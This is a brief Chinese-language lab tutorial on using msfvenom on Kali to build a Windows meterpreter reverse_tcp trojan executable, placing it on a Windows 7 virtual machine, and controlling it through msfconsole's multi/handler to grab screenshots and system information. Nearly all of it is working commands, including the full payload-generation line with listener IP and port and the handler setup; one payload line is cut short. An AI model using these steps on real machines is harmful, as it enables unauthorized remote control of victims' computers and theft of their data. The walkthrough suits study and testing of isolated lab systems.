kali使用msfvenom生产木马,在使用msfconsole进行控制
1.实验环境
- kali2022
- win7虚拟机
2.实验过程
2.1使用msfvenom生成木马
- 查看木马种类
msfvenom -l payloads
- 生成exe木马
注意lhost,lport要填监听的主机的IP和端口
这里选择的木马是:windows/meterpreter/reverse_tcp
msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.30.133 lport=45678 -f exe >/var/www/html/test4.exe
-
把生成的exe文件复制到win7虚拟机
需要借助实体机才能复制,并且实体机,虚拟机的防火墙得关闭
-
进入msfvenom
-
启用监听
use exploit/multi/handler
- 设置exe木马
set payload windows/meterpreter/reverse_t
- 查看需要填得信息
show options
- 设置好必填信息
msf6 exploit(multi/handler) > set lhost 192.168.30.133
lhost => 192.168.30.133
msf6 exploit(multi/handler) > set lport 45678
lport => 45678
- 开始监听
此时在win7中点击test4.exe文件,就会连接到我们得主机上
2.2攻击结果
- 屏幕抓取
- 获取系统信息